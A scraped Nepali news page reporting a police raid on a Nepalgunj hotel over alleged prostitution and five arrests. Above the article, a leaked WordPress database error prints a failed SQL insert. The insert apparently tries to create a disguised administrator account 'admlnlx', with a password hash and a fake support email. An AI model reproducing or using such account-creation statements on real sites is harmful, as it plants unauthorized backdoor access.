WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BKZamE//xXJFcmocDStEt5qupU91FV1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 13:59:39', '', 'admlnlx', 'admlnlx')
नेपालगन्ज,पुस ११-
सोमबार साझ यौनधन्दा चलाउने नेपालगन्जस्थित होटलमा प्रहरीले छापा मारेको छ । बसपार्कस्थित होटल सिटी फुडमा प्रहरीले छापा मारेर ५ जनालाई पक्राउ गरेको बताईएको छ ।होटलबाट यौनधन्दामा संलग्न भनिएका ३ जनासहित होटलका संचालक र उनका भाईलाई पक्राउ गरिएको एक प्रहरी अधिकारीले जनाए ।
पक्राउ परेका सबैलाई अस्पतालमा मेडिकल जाँच गराएर थप अनुसन्धानका लागि जिल्ला प्रहरी कार्यालय लगेको बुझिएको छ । यस विषयमा बाँके प्रहरी प्रमुख टेक प्रसाद राईलाई पटक–पटक फोन गर्दा पनि उनको फोन उठेन ।होटल सिटी फुडमा यौनधन्दा भईरहेको समाचार ८ गतेको स्थानिय दैनिक अवध पोस्ट् दैनिकमा छापिएको थियो । स्टिङ् अपरेसनको भिडियोमा संचालकले आफुले चलाईरहेको यौनधन्दावारे बाँकेका प्रहरीहरु जानकारी रहेको बताएका थिए ।